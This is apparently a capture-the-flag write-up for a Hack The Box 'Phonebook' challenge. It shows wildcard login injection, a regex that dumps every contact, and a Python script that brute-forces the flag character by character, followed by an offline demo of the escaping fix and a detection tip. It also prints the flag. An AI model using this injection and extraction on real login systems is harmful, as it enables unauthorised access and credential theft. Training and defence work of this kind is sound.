Phonebook

Date: 13, May, 2021

Author: Dhilip Sanjay S


Initial Recon

  • Initially I couldn't find a username and password for the login page, so I looked for endpoints other than login.

  • I was able to find two other endpoints:

    • 964430b4cdd199af19b986eaf2193b21f32542d0

    • search

Access Denied

  • The 964430b4cdd199af19b986eaf2193b21f32542d0 page had a search box, which made a POST request to the search endpoint, but every request came back with a 403 Access Denied error.

Dumping all the contacts in the phonebook

Login with wild card character (*)

  • Entering the wildcard character (*) as both the username and the password logged me into the site.

Search using regex (.*)

  • Now in the search box, I tried the same wildcard character, but it didn't work.

  • So I used the regex that matches any string, .*, which dumped every contact in the phonebook (name, e-mail address and phone number):

  • But wait, where is the flag??????

Finding the password/flag

  • We'll try to find the password. My intuition is that the password might be the flag.

  • We know that the wildcard character (*) lets us log in, so we can try placing characters before and after it.

  • So let's try * as the username and HTB{*} as the password, because this is the flag format for HTB challenges.

  • Now we are able to log in. This confirms that the password is the flag.

  • So we need a script to brute-force the flag one character at a time.

#!/usr/bin/env python3
import sys
import string
import requests

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character so it never appears inside a guess
printable = string.printable.replace('*', '')

while True:
    for character in printable:
        guess = ''.join(leaked_pass) + character + "*"
        print("Guessing " + guess)
        r = requests.post(url, data={"username": "*", "password": guess})
        # A Content-Length of 2586 is the response to a successful login
        # (observed while solving); any other length means the guess was wrong
        if r.headers.get('Content-Length') == '2586':
            leaked_pass.append(character)
            break
    else:
        # No character extended the prefix: stop instead of looping forever
        sys.exit("No match after " + ''.join(leaked_pass))

    # End of the flag
    if leaked_pass[-1] == '}':
        print("Flag: " + ''.join(leaked_pass))
        sys.exit()
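The prefix-plus-wildcard oracle that the script above relies on, replayed offline against a small in-memory directory, next to the RFC 4515 value escaping that closes it: with raw input, * logs in as anyone and the flag is recovered character by character; with escaping, the same requests fail and only the real credentials work. This is an added example, not code from the write-up or the challenge; it assumes the backend builds an LDAP-style substring filter from the form fields (the page never names its backend), and the directory entry, FLAG constant and function names are constructed here.

```python
import re
import string

# Constructed stand-in for the phonebook's directory (the page does not show the backend).
FLAG = "HTB{d1rectory_h4xx0r_is_k00l}"
DIRECTORY = [
    {"uid": "reese", "userPassword": FLAG},
]

def escape_filter_value(value):
    """RFC 4515 escaping for a value embedded in an LDAP search filter."""
    return "".join("\\%02x" % ord(c) if c in "*()\\\x00" else c for c in value)

def filter_match(pattern, value):
    """Emulate LDAP substring matching: '*' is a wildcard, '\\xx' a literal byte."""
    regex = ""
    for tok in re.findall(r"\\[0-9a-fA-F]{2}|\*|.", pattern, re.S):
        if tok == "*":
            regex += ".*"
        else:
            regex += re.escape(chr(int(tok[1:], 16)) if len(tok) == 3 else tok)
    return re.fullmatch(regex, value, re.S) is not None

def build_login(escape):
    """Login oracle that embeds user input in the filter raw (vulnerable) or escaped."""
    enc = escape_filter_value if escape else (lambda s: s)
    return lambda u, p: any(filter_match(enc(u), e["uid"])
                            and filter_match(enc(p), e["userPassword"]) for e in DIRECTORY)

def extract_secret(login, secret="HTB{", max_len=64):
    """The write-up's prefix-plus-wildcard oracle, generalised and guarded."""
    alphabet = string.printable.replace("*", "").strip()   # no wildcard, no whitespace
    while not secret.endswith("}") and len(secret) < max_len:
        for c in alphabet:
            if login("*", secret + c + "*"):
                secret += c
                break
        else:
            return None                          # nothing extended the prefix: stop
    return secret if secret.endswith("}") else None

def demo():
    """Compare the raw and escaped oracles on the constructed directory."""
    vuln, safe = build_login(escape=False), build_login(escape=True)
    return {
        "wildcard_login": (vuln("*", "*"), safe("*", "*")),
        "real_credentials": (vuln("reese", FLAG), safe("reese", FLAG)),
        "extracted_flag": (extract_secret(vuln), extract_secret(safe)),
    }
```

Detection of the same pattern on a real directory is simple: log the filters the application builds and alert on any that contain an unescaped * coming from a form field.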

Solution

  • We get the password/flag as: HTB{d1rectory_h4xx0r_is_k00l}
